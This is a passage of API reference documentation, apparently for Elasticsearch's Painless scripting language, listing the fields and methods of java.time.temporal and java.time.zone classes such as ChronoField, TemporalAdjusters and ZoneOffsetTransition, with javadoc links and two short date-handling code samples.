{java11-javadoc}/java.base/java/time/temporal/ChronoField.html#NANO_OF_DAY[NANO_OF_DAY] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#NANO_OF_SECOND[NANO_OF_SECOND] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#OFFSET_SECONDS[OFFSET_SECONDS] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#PROLEPTIC_MONTH[PROLEPTIC_MONTH] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#SECOND_OF_DAY[SECOND_OF_DAY] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#SECOND_OF_MINUTE[SECOND_OF_MINUTE] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#YEAR[YEAR] -* static ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#YEAR_OF_ERA[YEAR_OF_ERA] -* static 
ChronoField {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#valueOf(java.lang.String)[valueOf](null) -* static ChronoField[] {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#values()[values]() -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#adjustInto(java.time.temporal.Temporal,long)[adjustInto](Temporal, long) -* int {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#checkValidIntValue(long)[checkValidIntValue](long) -* long {java11-javadoc}/java.base/java/time/temporal/ChronoField.html#checkValidValue(long)[checkValidValue](long) -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* TemporalUnit {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#getBaseUnit()[getBaseUnit]() -* null {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#getDisplayName(java.util.Locale)[getDisplayName](Locale) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#getFrom(java.time.temporal.TemporalAccessor)[getFrom](TemporalAccessor) -* TemporalUnit {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#getRangeUnit()[getRangeUnit]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#isDateBased()[isDateBased]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#isSupportedBy(java.time.temporal.TemporalAccessor)[isSupportedBy](TemporalAccessor) -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#isTimeBased()[isTimeBased]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#range()[range]() -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#rangeRefinedBy(java.time.temporal.TemporalAccessor)[rangeRefinedBy](TemporalAccessor) -* TemporalAccessor {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#resolve(java.util.Map,java.time.temporal.TemporalAccessor,java.time.format.ResolverStyle)[resolve](Map, TemporalAccessor, ResolverStyle) -* null {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#toString()[toString]() - - -[[painless-api-reference-shared-ChronoUnit]] -==== ChronoUnit -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#CENTURIES[CENTURIES] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#DAYS[DAYS] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#DECADES[DECADES] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#ERAS[ERAS] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#FOREVER[FOREVER] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#HALF_DAYS[HALF_DAYS] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#HOURS[HOURS] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#MICROS[MICROS] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#MILLENNIA[MILLENNIA] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#MILLIS[MILLIS] -* static 
ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#MINUTES[MINUTES] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#MONTHS[MONTHS] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#NANOS[NANOS] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#SECONDS[SECONDS] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#WEEKS[WEEKS] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#YEARS[YEARS] -* static ChronoUnit {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#valueOf(java.lang.String)[valueOf](null) -* static ChronoUnit[] {java11-javadoc}/java.base/java/time/temporal/ChronoUnit.html#values()[values]() -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#addTo(java.time.temporal.Temporal,long)[addTo](Temporal, long) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#between(java.time.temporal.Temporal,java.time.temporal.Temporal)[between](Temporal, Temporal) -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* Duration {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#getDuration()[getDuration]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#isDateBased()[isDateBased]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#isDurationEstimated()[isDurationEstimated]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#isSupportedBy(java.time.temporal.Temporal)[isSupportedBy](Temporal) -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#isTimeBased()[isTimeBased]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* null {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#toString()[toString]() - - -[[painless-api-reference-shared-IsoFields]] -==== IsoFields -* static TemporalField {java11-javadoc}/java.base/java/time/temporal/IsoFields.html#DAY_OF_QUARTER[DAY_OF_QUARTER] -* static TemporalField {java11-javadoc}/java.base/java/time/temporal/IsoFields.html#QUARTER_OF_YEAR[QUARTER_OF_YEAR] -* static TemporalUnit {java11-javadoc}/java.base/java/time/temporal/IsoFields.html#QUARTER_YEARS[QUARTER_YEARS] -* static TemporalField {java11-javadoc}/java.base/java/time/temporal/IsoFields.html#WEEK_BASED_YEAR[WEEK_BASED_YEAR] -* static TemporalUnit {java11-javadoc}/java.base/java/time/temporal/IsoFields.html#WEEK_BASED_YEARS[WEEK_BASED_YEARS] -* static TemporalField {java11-javadoc}/java.base/java/time/temporal/IsoFields.html#WEEK_OF_WEEK_BASED_YEAR[WEEK_OF_WEEK_BASED_YEAR] -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-JulianFields]] -==== JulianFields -* static TemporalField {java11-javadoc}/java.base/java/time/temporal/JulianFields.html#JULIAN_DAY[JULIAN_DAY] -* static TemporalField 
{java11-javadoc}/java.base/java/time/temporal/JulianFields.html#MODIFIED_JULIAN_DAY[MODIFIED_JULIAN_DAY] -* static TemporalField {java11-javadoc}/java.base/java/time/temporal/JulianFields.html#RATA_DIE[RATA_DIE] -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Temporal]] -==== Temporal -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* Temporal {java11-javadoc}/java.base/java/time/temporal/Temporal.html#minus(java.time.temporal.TemporalAmount)[minus](TemporalAmount) -* Temporal {java11-javadoc}/java.base/java/time/temporal/Temporal.html#minus(long,java.time.temporal.TemporalUnit)[minus](long, TemporalUnit) -* Temporal {java11-javadoc}/java.base/java/time/temporal/Temporal.html#plus(java.time.temporal.TemporalAmount)[plus](TemporalAmount) -* Temporal {java11-javadoc}/java.base/java/time/temporal/Temporal.html#plus(long,java.time.temporal.TemporalUnit)[plus](long, TemporalUnit) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* long {java11-javadoc}/java.base/java/time/temporal/Temporal.html#until(java.time.temporal.Temporal,java.time.temporal.TemporalUnit)[until](Temporal, TemporalUnit) -* Temporal {java11-javadoc}/java.base/java/time/temporal/Temporal.html#with(java.time.temporal.TemporalAdjuster)[with](TemporalAdjuster) -* Temporal {java11-javadoc}/java.base/java/time/temporal/Temporal.html#with(java.time.temporal.TemporalField,long)[with](TemporalField, long) - - -[[painless-api-reference-shared-TemporalAccessor]] -==== TemporalAccessor -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - 
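Because `Temporal` and `TemporalAccessor` are interfaces, a script can be written against them instead of a concrete date type. A minimal sketch using only methods from the listings above; the helper name and the field choices are illustrative, not part of the shared API:

[source,painless]
----
// Minimal sketch: a helper that accepts any TemporalAccessor.
// safeGetLong is an illustrative name, not part of the shared API.
long safeGetLong(TemporalAccessor t, TemporalField f) {
  return t.isSupported(f) ? t.getLong(f) : -1L;
}
ZonedDateTime zdt = ZonedDateTime.of(2020, 6, 1, 0, 0, 0, 0, ZoneId.of('UTC'));
long epochSecond = safeGetLong(zdt, ChronoField.INSTANT_SECONDS);
long unsupported = safeGetLong(LocalDate.of(2020, 6, 1), ChronoField.NANO_OF_DAY); // -1
----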
- -[[painless-api-reference-shared-TemporalAdjuster]] -==== TemporalAdjuster -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-TemporalAdjusters]] -==== TemporalAdjusters -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#dayOfWeekInMonth(int,java.time.DayOfWeek)[dayOfWeekInMonth](int, DayOfWeek) -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#firstDayOfMonth()[firstDayOfMonth]() -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#firstDayOfNextMonth()[firstDayOfNextMonth]() -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#firstDayOfNextYear()[firstDayOfNextYear]() -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#firstDayOfYear()[firstDayOfYear]() -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#firstInMonth(java.time.DayOfWeek)[firstInMonth](DayOfWeek) -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#lastDayOfMonth()[lastDayOfMonth]() -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#lastDayOfYear()[lastDayOfYear]() -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#lastInMonth(java.time.DayOfWeek)[lastInMonth](DayOfWeek) -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#next(java.time.DayOfWeek)[next](DayOfWeek) -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#nextOrSame(java.time.DayOfWeek)[nextOrSame](DayOfWeek) -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#ofDateAdjuster(java.util.function.UnaryOperator)[ofDateAdjuster](UnaryOperator) -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#previous(java.time.DayOfWeek)[previous](DayOfWeek) -* static TemporalAdjuster {java11-javadoc}/java.base/java/time/temporal/TemporalAdjusters.html#previousOrSame(java.time.DayOfWeek)[previousOrSame](DayOfWeek) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-TemporalAmount]] -==== TemporalAmount -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAmount.html#addTo(java.time.temporal.Temporal)[addTo](Temporal) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAmount.html#get(java.time.temporal.TemporalUnit)[get](TemporalUnit) -* List {java11-javadoc}/java.base/java/time/temporal/TemporalAmount.html#getUnits()[getUnits]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Temporal 
{java11-javadoc}/java.base/java/time/temporal/TemporalAmount.html#subtractFrom(java.time.temporal.Temporal)[subtractFrom](Temporal) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-TemporalField]] -==== TemporalField -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#adjustInto(java.time.temporal.Temporal,long)[adjustInto](Temporal, long) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* TemporalUnit {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#getBaseUnit()[getBaseUnit]() -* null {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#getDisplayName(java.util.Locale)[getDisplayName](Locale) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#getFrom(java.time.temporal.TemporalAccessor)[getFrom](TemporalAccessor) -* TemporalUnit {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#getRangeUnit()[getRangeUnit]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#isDateBased()[isDateBased]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#isSupportedBy(java.time.temporal.TemporalAccessor)[isSupportedBy](TemporalAccessor) -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#isTimeBased()[isTimeBased]() -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#range()[range]() -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#rangeRefinedBy(java.time.temporal.TemporalAccessor)[rangeRefinedBy](TemporalAccessor) -* TemporalAccessor {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#resolve(java.util.Map,java.time.temporal.TemporalAccessor,java.time.format.ResolverStyle)[resolve](Map, TemporalAccessor, ResolverStyle) -* null {java11-javadoc}/java.base/java/time/temporal/TemporalField.html#toString()[toString]() - - -[[painless-api-reference-shared-TemporalQueries]] -==== TemporalQueries -* static TemporalQuery {java11-javadoc}/java.base/java/time/temporal/TemporalQueries.html#chronology()[chronology]() -* static TemporalQuery {java11-javadoc}/java.base/java/time/temporal/TemporalQueries.html#localDate()[localDate]() -* static TemporalQuery {java11-javadoc}/java.base/java/time/temporal/TemporalQueries.html#localTime()[localTime]() -* static TemporalQuery {java11-javadoc}/java.base/java/time/temporal/TemporalQueries.html#offset()[offset]() -* static TemporalQuery {java11-javadoc}/java.base/java/time/temporal/TemporalQueries.html#precision()[precision]() -* static TemporalQuery {java11-javadoc}/java.base/java/time/temporal/TemporalQueries.html#zone()[zone]() -* static TemporalQuery {java11-javadoc}/java.base/java/time/temporal/TemporalQueries.html#zoneId()[zoneId]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-TemporalQuery]] -==== TemporalQuery -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* def 
{java11-javadoc}/java.base/java/time/temporal/TemporalQuery.html#queryFrom(java.time.temporal.TemporalAccessor)[queryFrom](TemporalAccessor) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-TemporalUnit]] -==== TemporalUnit -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#addTo(java.time.temporal.Temporal,long)[addTo](Temporal, long) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#between(java.time.temporal.Temporal,java.time.temporal.Temporal)[between](Temporal, Temporal) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* Duration {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#getDuration()[getDuration]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#isDateBased()[isDateBased]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#isDurationEstimated()[isDurationEstimated]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#isSupportedBy(java.time.temporal.Temporal)[isSupportedBy](Temporal) -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#isTimeBased()[isTimeBased]() -* null {java11-javadoc}/java.base/java/time/temporal/TemporalUnit.html#toString()[toString]() - - -[[painless-api-reference-shared-UnsupportedTemporalTypeException]] -==== UnsupportedTemporalTypeException -* {java11-javadoc}/java.base/java/time/temporal/UnsupportedTemporalTypeException.html#(java.lang.String)[UnsupportedTemporalTypeException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ValueRange]] -==== ValueRange -* static ValueRange {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#of(long,long)[of](long, long) -* static ValueRange {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#of(long,long,long)[of](long, long, long) -* static ValueRange {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#of(long,long,long,long)[of](long, long, long, long) -* int {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#checkValidIntValue(long,java.time.temporal.TemporalField)[checkValidIntValue](long, TemporalField) -* long {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#checkValidValue(long,java.time.temporal.TemporalField)[checkValidValue](long, TemporalField) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#getLargestMinimum()[getLargestMinimum]() -* long {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#getMaximum()[getMaximum]() -* long {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#getMinimum()[getMinimum]() -* long {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#getSmallestMaximum()[getSmallestMaximum]() 
-* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#isFixed()[isFixed]() -* boolean {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#isIntValue()[isIntValue]() -* boolean {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#isValidIntValue(long)[isValidIntValue](long) -* boolean {java11-javadoc}/java.base/java/time/temporal/ValueRange.html#isValidValue(long)[isValidValue](long) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-WeekFields]] -==== WeekFields -* static WeekFields {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#ISO[ISO] -* static WeekFields {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#SUNDAY_START[SUNDAY_START] -* static TemporalUnit {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#WEEK_BASED_YEARS[WEEK_BASED_YEARS] -* static WeekFields {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#of(java.util.Locale)[of](Locale) -* static WeekFields {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#of(java.time.DayOfWeek,int)[of](DayOfWeek, int) -* TemporalField {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#dayOfWeek()[dayOfWeek]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* DayOfWeek {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#getFirstDayOfWeek()[getFirstDayOfWeek]() -* int {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#getMinimalDaysInFirstWeek()[getMinimalDaysInFirstWeek]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* TemporalField {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#weekBasedYear()[weekBasedYear]() -* TemporalField {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#weekOfMonth()[weekOfMonth]() -* TemporalField {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#weekOfWeekBasedYear()[weekOfWeekBasedYear]() -* TemporalField {java11-javadoc}/java.base/java/time/temporal/WeekFields.html#weekOfYear()[weekOfYear]() - - -[role="exclude",id="painless-api-reference-shared-java-time-zone"] -=== Shared API for package java.time.zone -See the <> for a high-level overview of all packages and classes. 
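For example, a script can look up the rules of a time zone and inspect its transitions. This is a minimal sketch and assumes the `ZoneId.getRules()` method from the `java.time` package section; the zone id and instant are arbitrary example values:

[source,painless]
----
// Minimal sketch: inspect daylight-saving state and the next offset transition.
ZoneRules rules = ZoneId.of('Europe/Paris').getRules();
Instant instant = Instant.ofEpochMilli(0L);
boolean inDst = rules.isDaylightSavings(instant);
ZoneOffset current = rules.getOffset(instant);
ZoneOffsetTransition next = rules.nextTransition(instant);
// nextTransition returns null for fixed-offset zones, so guard before using it.
ZoneOffset upcoming = next == null ? current : next.getOffsetAfter();
----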
- -[[painless-api-reference-shared-ZoneOffsetTransition]] -==== ZoneOffsetTransition -* static ZoneOffsetTransition {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#of(java.time.LocalDateTime,java.time.ZoneOffset,java.time.ZoneOffset)[of](LocalDateTime, ZoneOffset, ZoneOffset) -* int {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#compareTo(java.time.zone.ZoneOffsetTransition)[compareTo](ZoneOffsetTransition) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* LocalDateTime {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#getDateTimeAfter()[getDateTimeAfter]() -* LocalDateTime {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#getDateTimeBefore()[getDateTimeBefore]() -* Duration {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#getDuration()[getDuration]() -* Instant {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#getInstant()[getInstant]() -* ZoneOffset {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#getOffsetAfter()[getOffsetAfter]() -* ZoneOffset {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#getOffsetBefore()[getOffsetBefore]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#isGap()[isGap]() -* boolean {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#isOverlap()[isOverlap]() -* boolean {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#isValidOffset(java.time.ZoneOffset)[isValidOffset](ZoneOffset) -* long {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransition.html#toEpochSecond()[toEpochSecond]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ZoneOffsetTransitionRule]] -==== ZoneOffsetTransitionRule -* static ZoneOffsetTransitionRule {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule.html#of(java.time.Month,int,java.time.DayOfWeek,java.time.LocalTime,boolean,java.time.zone.ZoneOffsetTransitionRule$TimeDefinition,java.time.ZoneOffset,java.time.ZoneOffset,java.time.ZoneOffset)[of](Month, int, DayOfWeek, LocalTime, boolean, ZoneOffsetTransitionRule.TimeDefinition, ZoneOffset, ZoneOffset, ZoneOffset) -* ZoneOffsetTransition {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule.html#createTransition(int)[createTransition](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule.html#getDayOfMonthIndicator()[getDayOfMonthIndicator]() -* DayOfWeek {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule.html#getDayOfWeek()[getDayOfWeek]() -* LocalTime {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule.html#getLocalTime()[getLocalTime]() -* Month {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule.html#getMonth()[getMonth]() -* ZoneOffset {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule.html#getOffsetAfter()[getOffsetAfter]() -* ZoneOffset {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule.html#getOffsetBefore()[getOffsetBefore]() -* ZoneOffset {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule.html#getStandardOffset()[getStandardOffset]() -* ZoneOffsetTransitionRule.TimeDefinition 
{java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule.html#getTimeDefinition()[getTimeDefinition]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule.html#isMidnightEndOfDay()[isMidnightEndOfDay]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ZoneOffsetTransitionRule-TimeDefinition]] -==== ZoneOffsetTransitionRule.TimeDefinition -* static ZoneOffsetTransitionRule.TimeDefinition {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule$TimeDefinition.html#STANDARD[STANDARD] -* static ZoneOffsetTransitionRule.TimeDefinition {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule$TimeDefinition.html#UTC[UTC] -* static ZoneOffsetTransitionRule.TimeDefinition {java11-javadoc}/java.base/java/time/zone/ZoneOffsetTransitionRule$TimeDefinition.html#WALL[WALL] -* static ZoneOffsetTransitionRule.TimeDefinition 